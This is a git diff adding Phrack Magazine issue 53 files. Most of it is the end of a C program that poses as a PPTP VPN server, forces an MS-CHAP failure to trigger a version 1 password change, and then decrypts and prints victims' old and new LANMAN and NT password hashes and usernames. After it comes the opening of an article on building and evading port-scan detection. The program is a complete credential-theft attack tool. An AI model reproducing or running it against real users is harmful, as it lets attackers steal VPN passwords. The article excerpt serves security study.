+#define PPTP_MAGIC 0x1A2B3C4D /* Magic cookie for PPTP datagrams */
+#define PPTP_PORT  1723       /* PPTP TCP port number            */
+#define PPTP_PROTO 47         /* PPTP IP protocol number         */
+
+#define PPTP_MESSAGE_CONTROL            1
+#define PPTP_MESSAGE_MANAGE             2
+
+#define PPTP_VERSION_STRING     "1.00"
+#define PPTP_VERSION            0x100
+#define PPTP_FIRMWARE_STRING    "0.01"
+#define PPTP_FIRMWARE_VERSION   0x001
+
+/* (Control Connection Management) */
+#define PPTP_START_CTRL_CONN_RQST       1
+#define PPTP_START_CTRL_CONN_RPLY       2
+#define PPTP_STOP_CTRL_CONN_RQST        3
+#define PPTP_STOP_CTRL_CONN_RPLY        4
+#define PPTP_ECHO_RQST                  5
+#define PPTP_ECHO_RPLY                  6
+
+/* (Call Management) */
+#define PPTP_OUT_CALL_RQST              7
+#define PPTP_OUT_CALL_RPLY              8
+#define PPTP_IN_CALL_RQST               9
+#define PPTP_IN_CALL_RPLY               10
+#define PPTP_IN_CALL_CONNECT            11
+#define PPTP_CALL_CLEAR_RQST            12
+#define PPTP_CALL_CLEAR_NTFY            13
+
+/* (Error Reporting) */
+#define PPTP_WAN_ERR_NTFY               14
+
+/* (PPP Session Control) */
+#define PPTP_SET_LINK_INFO              15
+
+/* (Framing capabilities for msg sender) */
+#define PPTP_FRAME_ASYNC        1
+#define PPTP_FRAME_SYNC         2
+#define PPTP_FRAME_ANY          3
+
+/* (Bearer capabilities for msg sender) */
+#define PPTP_BEARER_ANALOG      1
+#define PPTP_BEARER_DIGITAL     2
+#define PPTP_BEARER_ANY         3
+
+struct pptp_header {
+  u_int16_t length;       /* message length in octets, including header */
+  u_int16_t pptp_type;    /* PPTP message type. 1 for control message.  */
+  u_int32_t magic;        /* this should be PPTP_MAGIC.                 */
+  u_int16_t ctrl_type;    /* Control message type (0-15)                */
+  u_int16_t reserved0;    /* reserved.  MUST BE ZERO.                   */
+};
+
+struct pptp_start_ctrl_conn { /* for control message types 1 and 2 */
+  struct pptp_header header;
+
+  u_int16_t version;      /* PPTP protocol version.  = PPTP_VERSION     */
+  u_int8_t  result_code;  /* these two fields should be zero on rqst msg*/
+  u_int8_t  error_code;   /* 0 unless result_code==2 (General Error)    */
+  u_int32_t framing_cap;  /* Framing capabilities                       */
+  u_int32_t bearer_cap;   /* Bearer Capabilities                        */
+  u_int16_t max_channels; /* Maximum Channels (=0 for PNS, PAC ignores) */
+  u_int16_t firmware_rev; /* Firmware or Software Revision              */
+  u_int8_t  hostname[64]; /* Host Name (64 octets, zero terminated)     */
+  u_int8_t  vendor[64];   /* Vendor string (64 octets, zero term.)      */
+  /* MS says that end of hostname/vendor fields should be filled with   */
+  /* octets of value 0, but Win95 PPTP driver doesn't do this.          */
+};
+
+struct pptp_out_call_rqst { /* for control message type 7 */
+  struct pptp_header header;
+  u_int16_t call_id;      /* Call ID (unique id used to multiplex data)  */
+  u_int16_t call_sernum;  /* Call Serial Number (used for logging)       */
+  u_int32_t bps_min;      /* Minimum BPS (lowest acceptable line speed)  */
+  u_int32_t bps_max;      /* Maximum BPS (highest acceptable line speed) */
+  u_int32_t bearer;       /* Bearer type                                 */
+  u_int32_t framing;      /* Framing type                                */
+  u_int16_t recv_size;    /* Recv. Window Size (no. of buffered packets) */
+  u_int16_t delay;        /* Packet Processing Delay (in 1/10 sec)       */
+  u_int16_t phone_len;    /* Phone Number Length (num. of valid digits)  */
+  u_int16_t reserved1;    /* MUST BE ZERO                                */
+  u_int8_t  phone_num[64]; /* Phone Number (64 octets, null term.)       */
+  u_int8_t subaddress[64]; /* Subaddress (64 octets, null term.)         */
+};
+
+struct pptp_out_call_rply { /* for control message type 8 */
+  struct pptp_header header;
+  u_int16_t call_id;      /* Call ID (used to multiplex data over tunnel)*/
+  u_int16_t call_id_peer; /* Peer's Call ID (call_id of pptp_out_call_rqst)*/
+  u_int8_t  result_code;  /* Result Code (1 is no errors)                */
+  u_int8_t  error_code;   /* Error Code (=0 unless result_code==2)       */
+  u_int16_t cause_code;   /* Cause Code (addt'l failure information)     */
+  u_int32_t speed;        /* Connect Speed (in BPS)                      */
+  u_int16_t recv_size;    /* Recv. Window Size (no. of buffered packets) */
+  u_int16_t delay;        /* Packet Processing Delay (in 1/10 sec)       */
+  u_int32_t channel;      /* Physical Channel ID (for logging)           */
+};
+
+
+struct pptp_set_link_info {   /* for control message type 15 */
+  struct pptp_header header;
+  u_int16_t call_id_peer; /* Peer's Call ID (call_id of pptp_out_call_rqst) */
+  u_int16_t reserved1;    /* MUST BE ZERO                                   */
+  u_int32_t send_accm;    /* Send ACCM (for PPP packets; default 0xFFFFFFFF)*/
+  u_int32_t recv_accm;    /* Receive ACCM (for PPP pack.;default 0xFFFFFFFF)*/
+};
+
+#define PPTP_GRE_PROTO  0x880B
+#define PPTP_GRE_VER    0x1
+
+#define PPTP_GRE_FLAG_C 0x80
+#define PPTP_GRE_FLAG_R 0x40
+#define PPTP_GRE_FLAG_K 0x20
+#define PPTP_GRE_FLAG_S 0x10
+#define PPTP_GRE_FLAG_A 0x80
+
+#define PPTP_GRE_IS_C(f) ((f)&PPTP_GRE_FLAG_C)
+#define PPTP_GRE_IS_R(f) ((f)&PPTP_GRE_FLAG_R)
+#define PPTP_GRE_IS_K(f) ((f)&PPTP_GRE_FLAG_K)
+#define PPTP_GRE_IS_S(f) ((f)&PPTP_GRE_FLAG_S)
+#define PPTP_GRE_IS_A(f) ((f)&PPTP_GRE_FLAG_A)
+
+struct pptp_gre_header {
+  u_int8_t flags;               /* bitfield */
+  u_int8_t ver;                 /* should be PPTP_GRE_VER (enhanced GRE) */
+  u_int16_t protocol;           /* should be PPTP_GRE_PROTO (ppp-encaps) */
+  u_int16_t payload_len;        /* size of ppp payload, not inc. gre header */
+  u_int16_t call_id;            /* peer's call_id for this session */
+  u_int32_t seq;                /* sequence number.  Present if S==1 */
+  u_int32_t ack;                /* seq number of highest packet recieved by */
+                                /*  sender in this session */
+};
+
+#define PACKET_MAX 8196
+
+static u_int32_t ack_sent, ack_recv;
+static u_int32_t seq_sent, seq_recv;
+static u_int16_t pptp_gre_call_id;
+
+#define PPP_ADDRESS			0xFF
+#define PPP_CONTROL			0x03
+
+/* PPP Protocols */
+#define PPP_PROTO_LCP			0xc021
+#define PPP_PROTO_CHAP			0xc223
+
+/* LCP Codes */
+#define PPP_LCP_CODE_CONF_RQST		1
+#define PPP_LCP_CODE_CONF_ACK		2
+#define PPP_LCP_CODE_IDENT		12
+
+/* LCP Config Options */
+#define PPP_LCP_CONFIG_OPT_AUTH         3
+#define PPP_LCP_CONFIG_OPT_MAGIC	5
+#define PPP_LCP_CONFIG_OPT_PFC		7
+#define PPP_LCP_CONFIG_OPT_ACFC		8
+
+/* Auth Algorithms */
+#define PPP_LCP_AUTH_CHAP_ALGO_MSCHAP	0x80
+
+/* CHAP Codes */
+#define PPP_CHAP_CODE_CHALLENGE			1
+#define PPP_CHAP_CODE_RESPONCE			2
+#define PPP_CHAP_CODE_SUCESS			3
+#define PPP_CHAP_CODE_FAILURE			4
+#define PPP_CHAP_CODE_MSCHAP_PASSWORD_V1	5
+#define PPP_CHAP_CODE_MSCHAP_PASSWORD_V2	6
+
+#define PPP_CHAP_CHALLENGE_SIZE		8
+#define PPP_CHAP_RESPONCE_SIZE          49
+
+#define MSCHAP_ERROR    "E=648 R=0"
+
+struct ppp_header {
+    u_int8_t address;
+    u_int8_t control;
+    u_int16_t proto;
+};
+
+struct ppp_lcp_chap_header {
+  u_int8_t code;
+  u_int8_t ident;
+  u_int16_t length;
+};
+
+struct ppp_lcp_packet {
+  struct ppp_header ppp;
+  struct ppp_lcp_chap_header lcp;
+};
+
+struct ppp_lcp_chap_auth_option {
+  u_int8_t type;
+  u_int8_t length;
+  u_int16_t auth_proto;
+  u_int8_t algorithm;
+};
+
+struct ppp_lcp_magic_option {
+  u_int8_t type;
+  u_int8_t length;
+  u_int32_t magic;
+};
+
+struct ppp_lcp_pfc_option {
+  u_int8_t type;
+  u_int8_t length;
+};
+
+struct ppp_lcp_acfc_option {
+  u_int8_t type;
+  u_int8_t length;
+};
+  
+
+struct ppp_chap_challenge {
+  u_int8_t size;
+  union {
+    unsigned char challenge[8];
+    struct {
+      unsigned char lanman[24];
+      unsigned char nt[24];
+      u_int8_t flag;
+    } responce;
+  } value;
+  /* name */
+};
+
+struct ppp_mschap_change_password {
+  char old_lanman[16];
+  char new_lanman[16];
+  char old_nt[16];
+  char new_nt[16];
+  u_int16_t pass_length;
+  u_int16_t flags;
+};
+
+#define ppp_chap_responce	ppp_chap_challenge
+
+void net_init();
+void getjiggywithit();
+void handleit(struct sockaddr_in *);
+void send_start_ctrl_conn_rply();
+void send_out_call_rply(struct pptp_out_call_rqst *, struct sockaddr_in *);
+int decaps_gre (int (*cb)(void *pack, unsigned len));
+int encaps_gre (void *pack, unsigned len);
+int do_ppp(void *pack, unsigned len);
+void do_gre(struct sockaddr_in *);
+void send_lcp_conf_rply(void *);
+void send_lcp_conf_rqst();
+void send_chap_challenge();
+void send_chap_failure();
+void print_challenge_responce(void *);
+void paydirt(void *);
+
+
+char *n;
+int sd, rsd, pid;
+
+void main(int argc, char **argv)
+{
+  n = argv[0];
+  net_init();
+  getjiggywithit();
+}
+
+void net_init()
+{
+  int yes = 1;
+  struct sockaddr_in sa;
+
+  if ((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror(n); exit(1); }
+  if (setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) != 0)
+  {
+    perror(n);
+    exit(1);
+  }
+
+  bzero((char *) &sa, sizeof(sa));
+  sa.sin_family      = AF_INET;
+  sa.sin_port        = htons(PPTP_PORT);
+  sa.sin_addr.s_addr = htonl(INADDR_ANY);
+
+  if (bind(sd, (struct sockaddr *)&sa, sizeof(sa)) < 0) { perror(n); exit(1); }
+
+  if (listen(sd, 5) < 0) { perror(n); exit(1); }
+}
+
+void getjiggywithit()
+{
+  struct sockaddr_in sa;
+  int sucker, size;
+  size = sizeof(sa);
+
+
+
+  if ((sucker = accept(sd, (struct sockaddr *)&sa, &size)) == -1)
+  {
+    perror(n);
+    exit(1);
+  }
+  close(sd);
+  sd = sucker;
+  handleit(&sa);
+  exit(0);
+}
+
+void handleit(struct sockaddr_in *sa)
+{
+  union {
+    struct pptp_header h;
+    unsigned char buffer[8196];
+  } p;
+  int hlen, len, type;
+
+  hlen = sizeof(struct pptp_header);
+
+  for(;;)
+  {
+    len = read(sd, p.buffer, hlen);
+    if (len == -1) { perror(n); exit(1); }
+    if (len != hlen) { printf("Short read.\n"); exit(1); }
+
+    len = read(sd, p.buffer + hlen, ntoh16(p.h.length) - hlen);
+    if (len == -1) { perror(n); exit(1); }
+    if (len != (ntoh16(p.h.length) - hlen)) {printf("Short read.\n"); exit(1);}
+
+    if (ntoh32(p.h.magic) != 0x1A2B3C4D) { printf("Bad magic.\n"); exit(1); }
+    if (ntoh16(p.h.pptp_type) != 1) {printf("Not a control message.\n");exit(1);}
+
+    type = ntoh16(p.h.ctrl_type);
+    switch(type)
+    {
+      /* we got a live one */
+      case PPTP_START_CTRL_CONN_RQST: 
+        send_start_ctrl_conn_rply();
+        break;
+      case PPTP_OUT_CALL_RQST:
+        send_out_call_rply((struct pptp_out_call_rqst *)&p, sa);
+        break;
+      case PPTP_SET_LINK_INFO:
+        printf("<- PPTP Set Link Info\n");
+        break;
+      default:
+        printf("<- PPTP unknown packet: %d\n", type);
+    }
+  }
+}
+
+void send_start_ctrl_conn_rply()
+{
+  struct pptp_start_ctrl_conn p;
+  int len, hlen;
+
+  hlen  = sizeof(struct pptp_start_ctrl_conn);
+
+  printf("<- PPTP Start Control Connection Request\n");
+  printf("-> PPTP Start Control Connection Reply\n");
+
+  bzero((char *)&p, hlen);
+  p.header.length    = hton16(hlen);
+  p.header.pptp_type = hton16(PPTP_MESSAGE_CONTROL);
+  p.header.magic     = hton32(PPTP_MAGIC);
+  p.header.ctrl_type = hton16(PPTP_START_CTRL_CONN_RPLY);
+  p.version          = hton16(PPTP_VERSION);
+  p.result_code      = 1;
+  p.framing_cap      = hton32(PPTP_FRAME_ASYNC);   /* whatever */
+  p.bearer_cap       = hton32(PPTP_BEARER_ANALOG); /* ditto    */
+  bcopy("owned", p.hostname, 5); 
+  bcopy("r00t", p.vendor, 4);
+
+  len = write(sd, &p, hlen);
+  if (len == -1) { perror(n); exit(1); }
+  if (len != hlen) { printf("Short write.\n"); exit(1); }
+}
+
+static gre = 0;
+
+void send_out_call_rply(struct pptp_out_call_rqst *r, struct sockaddr_in *sa)
+{
+  struct pptp_out_call_rply p;
+  int len, hlen;
+
+  hlen = sizeof(struct pptp_out_call_rply);
+
+  printf("<- PPTP Outgoing Call Request\n");
+  printf("-> PPTP Outgoing Call Reply\n");
+
+  pptp_gre_call_id = r->call_id;
+
+  /* Start a process to handle the GRE/PPP packets */
+  if (!gre) 
+  {
+    gre = 1;
+    switch((pid = fork()))
+    {
+      case -1:
+        perror(n);
+        exit(1);
+
+      case 0:
+        close(sd);
+        do_gre(sa);
+        exit(1);        /* not reached */
+    }
+  }
+
+  bzero((char *)&p, hlen);
+  p.header.length    = hton16(hlen);
+  p.header.pptp_type = hton16(PPTP_MESSAGE_CONTROL);
+  p.header.magic     = hton32(PPTP_MAGIC);
+  p.header.ctrl_type = hton16(PPTP_OUT_CALL_RPLY);
+  p.call_id          = hton16(31337);
+  p.call_id_peer     = r->call_id;
+  p.result_code      = 1;
+  p.speed            = hton32(28800);
+  p.recv_size        = hton16(5);   /* whatever */
+  p.delay            = hton16(50);  /* whatever */
+  p.channel          = hton32(31337);
+
+  len = write(sd, &p, hlen);
+  if (len == -1) { perror(n); exit(1); }
+  if (len != hlen) { printf("Short write.\n"); exit(1); }
+
+}
+
+struct sockaddr_in src_addr;
+
+void do_gre(struct sockaddr_in *sa)
+{
+#ifndef BROKEN_RAW_CONNECT
+  struct sockaddr_in src_addr;
+#endif
+  int s, n, stat;
+
+  /* Open IP protocol socket */
+  rsd = socket(AF_INET, SOCK_RAW, PPTP_PROTO);
+  if (rsd<0) { perror("gre"); exit(1); }
+  src_addr.sin_family = AF_INET;
+  src_addr.sin_addr   = sa->sin_addr;
+  src_addr.sin_port   = 0;
+
+#ifndef BROKEN_RAW_CONNECT
+  if (connect(rsd, (struct sockaddr *) &src_addr, sizeof(src_addr))<0) {
+    perror("gre"); exit(1);
+  }
+#endif
+
+  ack_sent = ack_recv = seq_sent = seq_recv = 0;
+  stat=0;
+
+  /* Dispatch loop */
+  while (stat>=0) { /* until error happens on s */
+    struct timeval tv = {0, 0}; /* non-blocking select */
+    fd_set rfds;
+    int retval;
+
+    n = rsd + 1;
+    FD_ZERO(&rfds);
+    FD_SET(rsd, &rfds);
+
+    /* if there is a pending ACK, do non-blocking select */
+    if (ack_sent!=seq_recv)
+      retval = select(n, &rfds, NULL, NULL, &tv);
+    else /* otherwise, block until data is available */
+      retval = select(n, &rfds, NULL, NULL, NULL);
+    if (retval==0 && ack_sent!=seq_recv) /* if outstanding ack */
+      encaps_gre(NULL, 0); /* send ack with no payload */
+    if (FD_ISSET(rsd,  &rfds)) /* data waiting on socket */
+      stat=decaps_gre(do_ppp);
+  }
+
+  /* Close up when done. */
+  close(rsd); 
+}
+
+int decaps_gre (int (*cb)(void *pack, unsigned len)) {
+  unsigned char buffer[PACKET_MAX+64/*ip header*/];
+  struct pptp_gre_header *header;
+  int status, ip_len=0;
+
+  if((status=read(rsd, buffer, sizeof(buffer)))<0) 
+    {perror("gre"); exit(1); }
+  /* strip off IP header, if present */
+  if ((buffer[0]&0xF0)==0x40) 
+    ip_len = (buffer[0]&0xF)*4;
+  header = (struct pptp_gre_header *)(buffer+ip_len);
+
+  /* verify packet (else discard) */
+  if (((ntoh8(header->ver)&0x7F)!=PPTP_GRE_VER) || /* version should be 1   */
+      (ntoh16(header->protocol)!=PPTP_GRE_PROTO)|| /* GRE protocol for PPTP */
+      PPTP_GRE_IS_C(ntoh8(header->flags)) ||    /* flag C should be clear   */
+      PPTP_GRE_IS_R(ntoh8(header->flags)) ||    /* flag R should be clear   */
+      (!PPTP_GRE_IS_K(ntoh8(header->flags))) || /* flag K should be set     */
+      ((ntoh8(header->flags)&0xF)!=0)) { /* routing and recursion ctrl = 0  */
+    /* if invalid, discard this packet */
+    printf("Discarding GRE: %X %X %X %X %X %X", 
+         ntoh8(header->ver)&0x7F, ntoh16(header->protocol), 
+         PPTP_GRE_IS_C(ntoh8(header->flags)),
+         PPTP_GRE_IS_R(ntoh8(header->flags)), 
+         PPTP_GRE_IS_K(ntoh8(header->flags)),
+         ntoh8(header->flags)&0xF);
+    return 0;
+  }
+  if (PPTP_GRE_IS_A(ntoh8(header->ver))) { /* acknowledgement present */
+    u_int32_t ack = (PPTP_GRE_IS_S(ntoh8(header->flags)))?
+      header->ack:header->seq; /* ack in different place if S=0 */
+    if (ack > ack_recv) ack_recv = ack;
+    /* also handle sequence number wrap-around (we're cool!) */
+    if (((ack>>31)==0)&&((ack_recv>>31)==1)) ack_recv=ack;
+  }
+  if (PPTP_GRE_IS_S(ntoh8(header->flags))) { /* payload present */
+    unsigned headersize = sizeof(*header);
+    unsigned payload_len= ntoh16(header->payload_len);
+    u_int32_t seq       = ntoh32(header->seq);
+    if (!PPTP_GRE_IS_A(ntoh8(header->ver))) headersize-=sizeof(header->ack);
+    /* check for incomplete packet (length smaller than expected) */
+    if (status-headersize<payload_len) {
+      printf("incomplete packet\n");
+      return 0; 
+    }
+    /* check for out-of-order sequence number */
+    /* (handle sequence number wrap-around, cuz we're cool) */
+    if ((seq > seq_recv) || 
+        (((seq>>31)==0) && (seq_recv>>31)==1)) {
+      seq_recv = seq;
+
+      return cb(buffer+ip_len+headersize, payload_len);
+    } else {
+      printf("discarding out-of-order\n"); 
+      return 0; /* discard out-of-order packets */
+    }
+  }
+  return 0; /* ack, but no payload */
+}
+
+int encaps_gre (void *pack, unsigned len) {
+  union {
+    struct pptp_gre_header header;
+    unsigned char buffer[PACKET_MAX+sizeof(struct pptp_gre_header)];
+  } u;
+  static u_int32_t seq=0;
+  unsigned header_len;
+  int out;
+
+  /* package this up in a GRE shell. */
+  u.header.flags        = hton8 (PPTP_GRE_FLAG_K);
+  u.header.ver          = hton8 (PPTP_GRE_VER);
+  u.header.protocol     = hton16(PPTP_GRE_PROTO);
+  u.header.payload_len  = hton16(len);
+  u.header.call_id      = hton16(pptp_gre_call_id);
+  
+  /* special case ACK with no payload */
+  if (pack==NULL) 
+    if (ack_sent != seq_recv) {
+      u.header.ver |= hton8(PPTP_GRE_FLAG_A);
+      u.header.payload_len = hton16(0);
+      u.header.seq = hton32(seq_recv); /* ack is in odd place because S=0 */
+      ack_sent = seq_recv;
+#ifndef BROKEN_RAW_CONNCET
+      return write(rsd, &u.header, sizeof(u.header)-sizeof(u.header.seq));
+#else
+      return sendto(rsd, &u.header, sizeof(u.header)-sizeof(u.header.seq), 0,
+            (struct sockaddr *) &src_addr, sizeof(src_addr));
+#endif
+    } else return 0; /* we don't need to send ACK */
+  /* send packet with payload */
+  u.header.flags |= hton8(PPTP_GRE_FLAG_S);
+  u.header.seq    = hton32(seq);
+  if (ack_sent != seq_recv) { /* send ack with this message */
+    u.header.ver |= hton8(PPTP_GRE_FLAG_A);
+    u.header.ack  = hton32(seq_recv);
+    ack_sent = seq_recv;
+    header_len = sizeof(u.header);
+  } else { /* don't send ack */
+    header_len = sizeof(u.header) - sizeof(u.header.ack);
+  }
+  if (header_len+len>=sizeof(u.buffer)) return 0; /* drop this, it's too big */
+  /* copy payload into buffer */
+  memcpy(u.buffer+header_len, pack, len);
+  /* record and increment sequence numbers */
+  seq_sent = seq; seq++;
+  /* write this baby out to the net */
+#ifndef BROKEN_RAW_CONNECT
+  return write(rsd, u.buffer, header_len+len);
+#else
+  return sendto(rsd, &u.buffer, header_len+len, 0,
+        (struct sockaddr *) &src_addr, sizeof(src_addr));
+#endif
+}
+
+
+int do_ppp(void *pack, unsigned len)
+{
+  struct {
+    struct ppp_header ppp;
+    struct ppp_lcp_chap_header header;
+  } *p;
+
+  p = pack;
+
+  switch(ntoh16(p->ppp.proto))
+  {
+    case PPP_PROTO_LCP:
+      switch(ntoh8(p->header.code))
+      {
+        case  PPP_LCP_CODE_CONF_RQST:
+          printf("<- LCP Configure Request\n");
+          send_lcp_conf_rply(pack);
+          send_lcp_conf_rqst();
+          break;
+        case  PPP_LCP_CODE_CONF_ACK:
+          printf("<- LCP Configure Ack\n");
+          send_chap_challenge(pack);
+
+          break;
+        case PPP_LCP_CODE_IDENT:
+          /* ignore */
+          break;
+        default:
+          printf("<- LCP unknown packet: C=%X I=%X L=%X\n", p->header.code, 
+            p->header.ident, ntoh16(p->header.length));
+      }
+      break;
+    case PPP_PROTO_CHAP:
+      switch(ntoh8(p->header.code))
+      {
+        case PPP_CHAP_CODE_RESPONCE:
+          printf("<- CHAP Responce\n");
+          print_challenge_responce(pack);
+          send_chap_failure();
+          break;
+        case PPP_CHAP_CODE_MSCHAP_PASSWORD_V1:
+          paydirt(pack);
+          break;
+        default:
+          printf("<- CHAP unknown packet: C=%X I=%X L=%X\n", p->header.code, 
+            p->header.ident, ntoh16(p->header.length));
+      }
+      break;
+    default:
+      printf("<- PPP unknwon  packet: %X\n", ntoh16(p->ppp.proto)); 
+  }
+
+  return(1);
+}
+
+void send_lcp_conf_rply(void *pack)
+{
+  struct {
+    struct ppp_header ppp;
+    struct ppp_lcp_chap_header lcp;
+  } *p = pack;
+
+  printf("-> LCP Configure Ack\n");
+
+  p->lcp.code = hton8(PPP_LCP_CODE_CONF_ACK);
+  encaps_gre(p, ntoh16(p->lcp.length) + sizeof(struct ppp_header));
+}
+
+void send_lcp_conf_rqst()
+{
+  struct {
+    struct ppp_header ppp;
+    struct ppp_lcp_chap_header lcp;
+    struct ppp_lcp_chap_auth_option auth;
+  } pkt;
+
+  printf("-> LCP Configure Request\n");
+
+  bzero(&pkt, sizeof(pkt));
+  pkt.ppp.address     = hton8(PPP_ADDRESS);
+  pkt.ppp.control     = hton8(PPP_CONTROL);
+  pkt.ppp.proto       = hton16(PPP_PROTO_LCP);
+  pkt.lcp.code        = hton8(PPP_LCP_CODE_CONF_RQST);
+  pkt.lcp.ident       = hton8(9);
+  pkt.lcp.length      = hton16(4 +5);
+  pkt.auth.type       = hton8(PPP_LCP_CONFIG_OPT_AUTH);
+  pkt.auth.length     = hton8(5);
+  pkt.auth.auth_proto = hton16(PPP_PROTO_CHAP);
+  pkt.auth.algorithm  = hton8(PPP_LCP_AUTH_CHAP_ALGO_MSCHAP);
+ 
+  encaps_gre(&pkt, 13);
+}
+
+void send_chap_challenge()
+{
+  struct {
+    struct ppp_header ppp;
+    struct ppp_lcp_chap_header chap;
+    struct ppp_chap_challenge challenge;
+  } pkt;
+
+  printf("-> CHAP Challenge\n");
+
+  bzero(&pkt, sizeof(pkt));
+  pkt.ppp.address    = hton8(PPP_ADDRESS);
+  pkt.ppp.control    = hton8(PPP_CONTROL);
+  pkt.ppp.proto      = hton16(PPP_PROTO_CHAP);
+  pkt.chap.code      = hton8(PPP_CHAP_CODE_CHALLENGE);
+  pkt.chap.length    = hton16(13);
+  pkt.challenge.size = hton8(8);
+
+  encaps_gre(&pkt,  4 + 13);
+}
+
+void print_challenge_responce(void *pack)
+{
+  unsigned char name[512], *c;
+  int len;
+  struct {
+    struct ppp_header ppp;
+    struct ppp_lcp_chap_header chap;
+    struct ppp_chap_challenge responce;
+  } *p;
+
+  p = pack;
+
+  c = p->responce.value.responce.lanman;
+  printf("   LANMAN Responce: %02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X\n",
+  c[ 0], c[ 1], c[ 2], c[ 3], c[ 4], c[ 5], c[ 6], c[ 7], c[ 8], c[ 9], c[10],
+  c[11], c[12], c[13], c[14], c[15], c[16], c[17], c[18], c[19], c[20], c[21],
+  c[22], c[23]);
+  c = p->responce.value.responce.nt;
+  printf("   NTHash Responce: %02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X\n",
+  c[ 0], c[ 1], c[ 2], c[ 3], c[ 4], c[ 5], c[ 6], c[ 7], c[ 8], c[ 9], c[10],
+  c[11], c[12], c[13], c[14], c[15], c[16], c[17], c[18], c[19], c[20], c[21],
+  c[22], c[23]);
+  printf("   Use NT hash: %d\n", p->responce.value.responce.flag);
+
+
+  bzero(name, 512);
+  len = ntoh16(p->chap.length) - 54;
+  bcopy(((char *)p) + 4 + 54, name, len);
+  name[len] = '\0';
+  printf("   User: %s\n", name);
+}
+
+void send_chap_failure()
+{
+  struct {
+    struct ppp_header ppp;
+    struct ppp_lcp_chap_header chap;
+    char message[64];
+  } pkt;
+
+  printf("-> CHAP Failure\n");
+
+  bzero(&pkt, sizeof(pkt));
+  pkt.ppp.address = hton8(PPP_ADDRESS);
+  pkt.ppp.control = hton8(PPP_CONTROL);
+  pkt.ppp.proto   = hton16(PPP_PROTO_CHAP);
+  pkt.chap.code   = hton8(PPP_CHAP_CODE_FAILURE);
+  pkt.chap.length = hton16(4 + strlen(MSCHAP_ERROR));
+  strncpy(pkt.message, MSCHAP_ERROR, strlen(MSCHAP_ERROR));
+
+  encaps_gre(&pkt,  4 + 4 + strlen(MSCHAP_ERROR));
+}
+
+extern int des_check_key;
+
+void paydirt(void *pack)
+{
+  unsigned char out[8], out2[8], key[8];
+  struct {
+    struct ppp_header ppp;
+    struct ppp_lcp_chap_header chap;
+    struct ppp_mschap_change_password passwds;
+  } *pkt;
+  des_key_schedule ks;
+
+  pkt =  pack;
+  bzero(key, 8);
+
+  printf("<- MSCHAP Change Password Version 1 Packet.\n");
+
+  /* Turn off checking for weak keys within libdes */
+  des_check_key=0;
+  des_set_odd_parity((des_cblock *)key);
+  des_set_key((des_cblock *)key, ks);
+
+  des_ecb_encrypt((des_cblock *)pkt->passwds.old_lanman,(des_cblock *) out, ks, 0);
+  des_ecb_encrypt((des_cblock *)(pkt->passwds.old_lanman + 8), (des_cblock *)out2, ks, 0);
+  printf("   Old LANMAN: %02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X\n",
+  out [0], out [1], out [2], out [3], out [4], out [5], out [6], out [7],
+  out2[0], out2[1], out2[2], out2[3], out2[4], out2[5], out2[6], out2[7]);
+
+  des_ecb_encrypt((des_cblock *)pkt->passwds.new_lanman,(des_cblock *) out, ks, 0);
+  des_ecb_encrypt((des_cblock *)(pkt->passwds.new_lanman + 8), (des_cblock *)out2, ks, 0);
+  printf("   New LANMAN: %02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X\n",
+  out [0], out [1], out [2], out [3], out [4], out [5], out [6], out [7],
+  out2[0], out2[1], out2[2], out2[3], out2[4], out2[5], out2[6], out2[7]);
+
+  des_ecb_encrypt((des_cblock *)pkt->passwds.old_nt,(des_cblock *) out, ks, 0);
+  des_ecb_encrypt((des_cblock *)(pkt->passwds.old_nt + 8), (des_cblock *)out2, ks, 0);
+  printf("   Old NTHash: %02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X\n",
+  out [0], out [1], out [2], out [3], out [4], out [5], out [6], out [7],
+  out2[0], out2[1], out2[2], out2[3], out2[4], out2[5], out2[6], out2[7]);
+
+  des_ecb_encrypt((des_cblock *)pkt->passwds.new_nt,(des_cblock *) out, ks, 0);
+  des_ecb_encrypt((des_cblock *)(pkt->passwds.new_nt + 8), (des_cblock *)out2, ks, 0);
+  printf("   New NTHash: %02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X\n",
+  out [0], out [1], out [2], out [3], out [4], out [5], out [6], out [7],
+  out2[0], out2[1], out2[2], out2[3], out2[4], out2[5], out2[6], out2[7]);
+
+  printf("   New Password Length: %d\n", ntoh16(pkt->passwds.pass_length));
+
+  kill(pid, SIGTERM);
+  exit(0);
+}
+<-->
+
+
+----[  EOF
+
diff --git a/phrack53/13.txt b/phrack53/13.txt
new file mode 100644
index 0000000..9048713
--- /dev/null
+++ b/phrack53/13.txt
@@ -0,0 +1,660 @@
+---[  Phrack Magazine   Volume 8, Issue 53 July 8, 1998, article 13 of 15
+
+
+-------------------------[  Designing and Attacking Port Scan Detection Tools
+
+
+--------[  solar designer <solar@false.com>
+                                                         
+
+----[  Introduction
+
+The purpose of this article is to show potential problems with intrusion
+detection systems (IDS), concentrating on one simple attack: port scans.
+
+This lets me cover all components of such a simplified IDS.  Also, unlike
+the great SNI paper (http://www.secnet.com/papers/IDS.PS), this article
+is not limited to network-based tools.  In fact, the simple and hopefully
+reliable example port scan detection tool ("scanlogd") that you'll find
+at the end is host-based.
+
+
+----[  What Can We Detect?
+
+A port scan involves an attacker trying many destination ports, usually
+including some that turn out not to be listening.  One "signature" that
+could be used for detecting port scans is "several packets to different
+destination ports from the same source address within a short period of
+time".  Another such signature could be "SYN to a non-listening port".
+Obviously, there are many other ways to detect port scans, up to dumping
+all the packet headers to a file and analyzing them manually (ouch).
+
+All of these different methods have their own advantages and disadvantages,
+resulting in different numbers of "false positives" and "false negatives".
+Now, let me show that, for this particular attack type, it is always possible
+for an attacker to make her attack either very unlikely to be noticed, or very
+unlikely to be traced to its real origin, while still being able to obtain
+the port number information.
+
+To obscure the attack, an attacker could do the scan very slowly.  Unless the
+target system is normally idle (in which case one packet to a non-listening
+port is enough for the admin to notice, not a likely real world situation),
+it is possible to make the delay between ports large enough for this to be
+likely not recognized as a scan.
+
